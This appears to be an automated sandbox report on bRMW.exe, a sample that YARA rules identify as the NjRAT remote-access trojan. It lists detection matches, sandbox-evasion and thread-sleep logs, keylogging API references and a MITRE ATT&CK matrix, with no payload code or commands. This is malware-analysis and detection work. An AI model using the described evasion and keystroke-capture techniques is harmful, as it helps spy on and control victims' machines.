              Source: bRMW.exe, type: SAMPLEMatched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
              Source: bRMW.exe, type: SAMPLEMatched rule: CN_disclosed_20180208_c date = 2018-02-08, hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: bRMW.exe, type: SAMPLEMatched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
              Source: 0.0.bRMW.exe.ff0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
              Source: 0.0.bRMW.exe.ff0000.0.unpack, type: UNPACKEDPEMatched rule: CN_disclosed_20180208_c date = 2018-02-08, hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 0.0.bRMW.exe.ff0000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
              Source: 00000000.00000000.1994678627.0000000000FF2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
              Source: C:\Users\user\Desktop\bRMW.exeCode function: 0_2_031DDBF00_2_031DDBF0
              Source: C:\Users\user\Desktop\bRMW.exeCode function: 0_2_031D48100_2_031D4810
              Source: C:\Users\user\Desktop\bRMW.exeCode function: 0_2_031DF2900_2_031DF290
              Source: C:\Users\user\Desktop\bRMW.exeProcess Stats: CPU usage > 49%
              Source: bRMW.exe, 00000000.00000002.4452699978.00000000014DE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs bRMW.exe
              Source: bRMW.exe, 00000000.00000002.4450758219.0000000001387000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs bRMW.exe
              Source: bRMW.exe, 00000000.00000000.1994678627.0000000000FF2000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameServer.exe4 vs bRMW.exe
              Source: bRMW.exeBinary or memory string: OriginalFilenameServer.exe4 vs bRMW.exe
              Source: bRMW.exeReversingLabs: Detection: 89%
              Source: bRMW.exeVirustotal: Detection: 73%
              Source: C:\Users\user\Desktop\bRMW.exeFile read: C:\Users\user\Desktop\bRMW.exeJump to behavior
              Source: bRMW.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Users\user\Desktop\bRMW.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: C:\Users\user\Desktop\bRMW.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32Jump to behavior
              Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@1/0@3/2
              Source: bRMW.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
              Source: C:\Users\user\Desktop\bRMW.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a403a0b75e95c07da2caa7f780446a62\mscorlib.ni.dllJump to behavior
              Source: C:\Users\user\Desktop\bRMW.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
              Source: bRMW.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
              Source: bRMW.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Source: Binary string: mscorlib.pdb source: bRMW.exe, 00000000.00000002.4455595232.0000000006E40000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: n0C:\Windows\mscorlib.pdb source: bRMW.exe, 00000000.00000002.4455249840.0000000005A5B000.00000004.00000010.00020000.00000000.sdmp

              Data Obfuscation

              barindex
              Source: bRMW.exe, OK.cs.Net Code: Plugin System.Reflection.Assembly.Load(byte[])
              Source: C:\Users\user\Desktop\bRMW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\bRMW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\bRMW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\bRMW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\bRMW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\bRMW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\bRMW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\bRMW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\bRMW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\bRMW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\bRMW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\bRMW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\bRMW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\bRMW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\bRMW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\bRMW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\bRMW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\bRMW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\bRMW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\bRMW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\bRMW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\bRMW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\bRMW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\bRMW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\bRMW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\bRMW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\bRMW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\bRMW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\bRMW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\bRMW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\bRMW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\bRMW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\bRMW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\bRMW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\bRMW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\bRMW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\bRMW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\bRMW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\bRMW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\bRMW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\bRMW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\bRMW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\bRMW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\bRMW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\bRMW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\bRMW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\bRMW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\bRMW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\bRMW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\bRMW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\bRMW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\bRMW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\bRMW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\bRMW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\bRMW.exe TID: 6620Thread sleep count: 485 > 30Jump to behavior
              Source: C:\Users\user\Desktop\bRMW.exe TID: 4124Thread sleep count: 37 > 30Jump to behavior
              Source: C:\Users\user\Desktop\bRMW.exe TID: 4124Thread sleep time: -34126476536362649s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\bRMW.exe TID: 4124Thread sleep time: -600000s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\bRMW.exe TID: 4292Thread sleep count: 846 > 30Jump to behavior
              Source: C:\Users\user\Desktop\bRMW.exe TID: 4124Thread sleep time: -599890s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\bRMW.exe TID: 4292Thread sleep count: 8300 > 30Jump to behavior
              Source: C:\Users\user\Desktop\bRMW.exe TID: 4124Thread sleep time: -599781s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\bRMW.exe TID: 4124Thread sleep time: -599672s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\bRMW.exe TID: 4124Thread sleep time: -599562s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\bRMW.exe TID: 4124Thread sleep time: -599453s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\bRMW.exe TID: 4124Thread sleep time: -599343s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\bRMW.exe TID: 4124Thread sleep time: -599234s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\bRMW.exe TID: 4124Thread sleep time: -599124s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\bRMW.exe TID: 4124Thread sleep time: -599015s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\bRMW.exe TID: 4124Thread sleep time: -598906s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\bRMW.exe TID: 4124Thread sleep time: -598796s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\bRMW.exe TID: 4124Thread sleep time: -598687s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\bRMW.exe TID: 4124Thread sleep time: -598578s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\bRMW.exe TID: 4124Thread sleep time: -598468s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\bRMW.exe TID: 4124Thread sleep time: -598359s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\bRMW.exe TID: 4124Thread sleep time: -598250s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\bRMW.exe TID: 4124Thread sleep time: -598140s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\bRMW.exe TID: 4124Thread sleep time: -598031s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\bRMW.exe TID: 4124Thread sleep time: -597922s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\bRMW.exe TID: 4124Thread sleep time: -597812s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\bRMW.exe TID: 4124Thread sleep time: -597703s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\bRMW.exe TID: 4124Thread sleep time: -597593s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\bRMW.exe TID: 4124Thread sleep time: -597484s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\bRMW.exe TID: 4124Thread sleep time: -597374s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\bRMW.exe TID: 4124Thread sleep time: -597265s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\bRMW.exe TID: 4124Thread sleep time: -597156s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\bRMW.exe TID: 4124Thread sleep time: -597046s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\bRMW.exe TID: 4124Thread sleep time: -596937s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\bRMW.exe TID: 4124Thread sleep time: -596828s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\bRMW.exe TID: 4124Thread sleep time: -596718s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\bRMW.exe TID: 4124Thread sleep time: -596608s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\bRMW.exe TID: 4124Thread sleep time: -596499s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\bRMW.exe TID: 4124Thread sleep time: -596389s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\bRMW.exe TID: 4124Thread sleep time: -596281s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\bRMW.exe TID: 4124Thread sleep time: -596171s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\bRMW.exe TID: 4124Thread sleep time: -596062s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\bRMW.exe TID: 4124Thread sleep time: -595953s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\bRMW.exe TID: 4124Thread sleep time: -595843s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\bRMW.exe TID: 4124Thread sleep time: -595733s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\bRMW.exe TID: 4124Thread sleep time: -595625s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\bRMW.exe TID: 4124Thread sleep time: -595515s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\bRMW.exe TID: 4124Thread sleep time: -595406s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\bRMW.exe TID: 4124Thread sleep time: -595296s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\bRMW.exe TID: 4124Thread sleep time: -595187s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\bRMW.exe TID: 4124Thread sleep time: -595078s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\bRMW.exe TID: 4124Thread sleep time: -594968s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\bRMW.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\Desktop\bRMW.exeThread delayed: delay time: 600000Jump to behavior
              Source: C:\Users\user\Desktop\bRMW.exeThread delayed: delay time: 599890Jump to behavior
              Source: C:\Users\user\Desktop\bRMW.exeThread delayed: delay time: 599781Jump to behavior
              Source: C:\Users\user\Desktop\bRMW.exeThread delayed: delay time: 599672Jump to behavior
              Source: C:\Users\user\Desktop\bRMW.exeThread delayed: delay time: 599562Jump to behavior
              Source: C:\Users\user\Desktop\bRMW.exeThread delayed: delay time: 599453Jump to behavior
              Source: C:\Users\user\Desktop\bRMW.exeThread delayed: delay time: 599343Jump to behavior
              Source: C:\Users\user\Desktop\bRMW.exeThread delayed: delay time: 599234Jump to behavior
              Source: C:\Users\user\Desktop\bRMW.exeThread delayed: delay time: 599124Jump to behavior
              Source: C:\Users\user\Desktop\bRMW.exeThread delayed: delay time: 599015Jump to behavior
              Source: C:\Users\user\Desktop\bRMW.exeThread delayed: delay time: 598906Jump to behavior
              Source: C:\Users\user\Desktop\bRMW.exeThread delayed: delay time: 598796Jump to behavior
              Source: C:\Users\user\Desktop\bRMW.exeThread delayed: delay time: 598687Jump to behavior
              Source: C:\Users\user\Desktop\bRMW.exeThread delayed: delay time: 598578Jump to behavior
              Source: C:\Users\user\Desktop\bRMW.exeThread delayed: delay time: 598468Jump to behavior
              Source: C:\Users\user\Desktop\bRMW.exeThread delayed: delay time: 598359Jump to behavior
              Source: C:\Users\user\Desktop\bRMW.exeThread delayed: delay time: 598250Jump to behavior
              Source: C:\Users\user\Desktop\bRMW.exeThread delayed: delay time: 598140Jump to behavior
              Source: C:\Users\user\Desktop\bRMW.exeThread delayed: delay time: 598031Jump to behavior
              Source: C:\Users\user\Desktop\bRMW.exeThread delayed: delay time: 597922Jump to behavior
              Source: C:\Users\user\Desktop\bRMW.exeThread delayed: delay time: 597812Jump to behavior
              Source: C:\Users\user\Desktop\bRMW.exeThread delayed: delay time: 597703Jump to behavior
              Source: C:\Users\user\Desktop\bRMW.exeThread delayed: delay time: 597593Jump to behavior
              Source: C:\Users\user\Desktop\bRMW.exeThread delayed: delay time: 597484Jump to behavior
              Source: C:\Users\user\Desktop\bRMW.exeThread delayed: delay time: 597374Jump to behavior
              Source: C:\Users\user\Desktop\bRMW.exeThread delayed: delay time: 597265Jump to behavior
              Source: C:\Users\user\Desktop\bRMW.exeThread delayed: delay time: 597156Jump to behavior
              Source: C:\Users\user\Desktop\bRMW.exeThread delayed: delay time: 597046Jump to behavior
              Source: C:\Users\user\Desktop\bRMW.exeThread delayed: delay time: 596937Jump to behavior
              Source: C:\Users\user\Desktop\bRMW.exeThread delayed: delay time: 596828Jump to behavior
              Source: C:\Users\user\Desktop\bRMW.exeThread delayed: delay time: 596718Jump to behavior
              Source: C:\Users\user\Desktop\bRMW.exeThread delayed: delay time: 596608Jump to behavior
              Source: C:\Users\user\Desktop\bRMW.exeThread delayed: delay time: 596499Jump to behavior
              Source: C:\Users\user\Desktop\bRMW.exeThread delayed: delay time: 596389Jump to behavior
              Source: C:\Users\user\Desktop\bRMW.exeThread delayed: delay time: 596281Jump to behavior
              Source: C:\Users\user\Desktop\bRMW.exeThread delayed: delay time: 596171Jump to behavior
              Source: C:\Users\user\Desktop\bRMW.exeThread delayed: delay time: 596062Jump to behavior
              Source: C:\Users\user\Desktop\bRMW.exeThread delayed: delay time: 595953Jump to behavior
              Source: C:\Users\user\Desktop\bRMW.exeThread delayed: delay time: 595843Jump to behavior
              Source: C:\Users\user\Desktop\bRMW.exeThread delayed: delay time: 595733Jump to behavior
              Source: C:\Users\user\Desktop\bRMW.exeThread delayed: delay time: 595625Jump to behavior
              Source: C:\Users\user\Desktop\bRMW.exeThread delayed: delay time: 595515Jump to behavior
              Source: C:\Users\user\Desktop\bRMW.exeThread delayed: delay time: 595406Jump to behavior
              Source: C:\Users\user\Desktop\bRMW.exeThread delayed: delay time: 595296Jump to behavior
              Source: C:\Users\user\Desktop\bRMW.exeThread delayed: delay time: 595187Jump to behavior
              Source: C:\Users\user\Desktop\bRMW.exeThread delayed: delay time: 595078Jump to behavior
              Source: C:\Users\user\Desktop\bRMW.exeThread delayed: delay time: 594968Jump to behavior
              Source: C:\Users\user\Desktop\bRMW.exeWindow / User API: threadDelayed 485Jump to behavior
              Source: C:\Users\user\Desktop\bRMW.exeWindow / User API: threadDelayed 846Jump to behavior
              Source: C:\Users\user\Desktop\bRMW.exeWindow / User API: threadDelayed 8300Jump to behavior
              Source: C:\Users\user\Desktop\bRMW.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\Desktop\bRMW.exeThread delayed: delay time: 600000Jump to behavior
              Source: C:\Users\user\Desktop\bRMW.exeThread delayed: delay time: 599890Jump to behavior
              Source: C:\Users\user\Desktop\bRMW.exeThread delayed: delay time: 599781Jump to behavior
              Source: C:\Users\user\Desktop\bRMW.exeThread delayed: delay time: 599672Jump to behavior
              Source: C:\Users\user\Desktop\bRMW.exeThread delayed: delay time: 599562Jump to behavior
              Source: C:\Users\user\Desktop\bRMW.exeThread delayed: delay time: 599453Jump to behavior
              Source: C:\Users\user\Desktop\bRMW.exeThread delayed: delay time: 599343Jump to behavior
              Source: C:\Users\user\Desktop\bRMW.exeThread delayed: delay time: 599234Jump to behavior
              Source: C:\Users\user\Desktop\bRMW.exeThread delayed: delay time: 599124Jump to behavior
              Source: C:\Users\user\Desktop\bRMW.exeThread delayed: delay time: 599015Jump to behavior
              Source: C:\Users\user\Desktop\bRMW.exeThread delayed: delay time: 598906Jump to behavior
              Source: C:\Users\user\Desktop\bRMW.exeThread delayed: delay time: 598796Jump to behavior
              Source: C:\Users\user\Desktop\bRMW.exeThread delayed: delay time: 598687Jump to behavior
              Source: C:\Users\user\Desktop\bRMW.exeThread delayed: delay time: 598578Jump to behavior
              Source: C:\Users\user\Desktop\bRMW.exeThread delayed: delay time: 598468Jump to behavior
              Source: C:\Users\user\Desktop\bRMW.exeThread delayed: delay time: 598359Jump to behavior
              Source: C:\Users\user\Desktop\bRMW.exeThread delayed: delay time: 598250Jump to behavior
              Source: C:\Users\user\Desktop\bRMW.exeThread delayed: delay time: 598140Jump to behavior
              Source: C:\Users\user\Desktop\bRMW.exeThread delayed: delay time: 598031Jump to behavior
              Source: C:\Users\user\Desktop\bRMW.exeThread delayed: delay time: 597922Jump to behavior
              Source: C:\Users\user\Desktop\bRMW.exeThread delayed: delay time: 597812Jump to behavior
              Source: C:\Users\user\Desktop\bRMW.exeThread delayed: delay time: 597703Jump to behavior
              Source: C:\Users\user\Desktop\bRMW.exeThread delayed: delay time: 597593Jump to behavior
              Source: C:\Users\user\Desktop\bRMW.exeThread delayed: delay time: 597484Jump to behavior
              Source: C:\Users\user\Desktop\bRMW.exeThread delayed: delay time: 597374Jump to behavior
              Source: C:\Users\user\Desktop\bRMW.exeThread delayed: delay time: 597265Jump to behavior
              Source: C:\Users\user\Desktop\bRMW.exeThread delayed: delay time: 597156Jump to behavior
              Source: C:\Users\user\Desktop\bRMW.exeThread delayed: delay time: 597046Jump to behavior
              Source: C:\Users\user\Desktop\bRMW.exeThread delayed: delay time: 596937Jump to behavior
              Source: C:\Users\user\Desktop\bRMW.exeThread delayed: delay time: 596828Jump to behavior
              Source: C:\Users\user\Desktop\bRMW.exeThread delayed: delay time: 596718Jump to behavior
              Source: C:\Users\user\Desktop\bRMW.exeThread delayed: delay time: 596608Jump to behavior
              Source: C:\Users\user\Desktop\bRMW.exeThread delayed: delay time: 596499Jump to behavior
              Source: C:\Users\user\Desktop\bRMW.exeThread delayed: delay time: 596389Jump to behavior
              Source: C:\Users\user\Desktop\bRMW.exeThread delayed: delay time: 596281Jump to behavior
              Source: C:\Users\user\Desktop\bRMW.exeThread delayed: delay time: 596171Jump to behavior
              Source: C:\Users\user\Desktop\bRMW.exeThread delayed: delay time: 596062Jump to behavior
              Source: C:\Users\user\Desktop\bRMW.exeThread delayed: delay time: 595953Jump to behavior
              Source: C:\Users\user\Desktop\bRMW.exeThread delayed: delay time: 595843Jump to behavior
              Source: C:\Users\user\Desktop\bRMW.exeThread delayed: delay time: 595733Jump to behavior
              Source: C:\Users\user\Desktop\bRMW.exeThread delayed: delay time: 595625Jump to behavior
              Source: C:\Users\user\Desktop\bRMW.exeThread delayed: delay time: 595515Jump to behavior
              Source: C:\Users\user\Desktop\bRMW.exeThread delayed: delay time: 595406Jump to behavior
              Source: C:\Users\user\Desktop\bRMW.exeThread delayed: delay time: 595296Jump to behavior
              Source: C:\Users\user\Desktop\bRMW.exeThread delayed: delay time: 595187Jump to behavior
              Source: C:\Users\user\Desktop\bRMW.exeThread delayed: delay time: 595078Jump to behavior
              Source: C:\Users\user\Desktop\bRMW.exeThread delayed: delay time: 594968Jump to behavior
              Source: bRMW.exe, 00000000.00000002.4452699978.0000000001511000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
              Source: C:\Users\user\Desktop\bRMW.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Users\user\Desktop\bRMW.exeMemory allocated: page read and write | page guardJump to behavior

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Source: bRMW.exe, kl.csReference to suspicious API methods: MapVirtualKey(a, 0u)
              Source: bRMW.exe, kl.csReference to suspicious API methods: GetAsyncKeyState(num2)
              Source: bRMW.exe, OK.csReference to suspicious API methods: capGetDriverDescriptionA(wDriver, ref lpszName, cbName, ref lpszVer, 100)
              Source: C:\Users\user\Desktop\bRMW.exeQueries volume information: C:\Users\user\Desktop\bRMW.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\bRMW.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\bRMW.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\bRMW.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\bRMW.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\bRMW.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

              Stealing of Sensitive Information

              barindex
              Source: Yara matchFile source: bRMW.exe, type: SAMPLE
              Source: Yara matchFile source: 0.0.bRMW.exe.ff0000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000000.00000000.1994678627.0000000000FF2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: bRMW.exe PID: 2748, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Source: Yara matchFile source: bRMW.exe, type: SAMPLE
              Source: Yara matchFile source: 0.0.bRMW.exe.ff0000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000000.00000000.1994678627.0000000000FF2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: bRMW.exe PID: 2748, type: MEMORYSTR
              Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpactResource DevelopmentReconnaissance
              Valid Accounts1
              Native API
              Path InterceptionPath Interception1
              Disable or Modify Tools
              1
              Input Capture
              1
              Security Software Discovery
              Remote Services1
              Input Capture
              Exfiltration Over Other Network Medium11
              Encrypted Channel
              Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationAbuse Accessibility FeaturesAcquire InfrastructureGather Victim Identity Information
              Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts21
              Virtualization/Sandbox Evasion
              LSASS Memory21
              Virtualization/Sandbox Evasion
              Remote Desktop Protocol1
              Archive Collected Data
              Exfiltration Over Bluetooth1
              Non-Standard Port
              SIM Card SwapObtain Device Cloud BackupsNetwork Denial of ServiceDomainsCredentials
              Domain AccountsAtLogon Script (Windows)Logon Script (Windows)1
              Software Packing
              Security Account Manager1
              Application Window Discovery
              SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration1
              Ingress Tool Transfer
              Data Encrypted for ImpactDNS ServerEmail Addresses
              Local AccountsCronLogin HookLogin HookBinary PaddingNTDS12
              System Information Discovery
              Distributed Component Object ModelInput CaptureTraffic Duplication2
              Non-Application Layer Protocol
              Data DestructionVirtual Private ServerEmployee Names
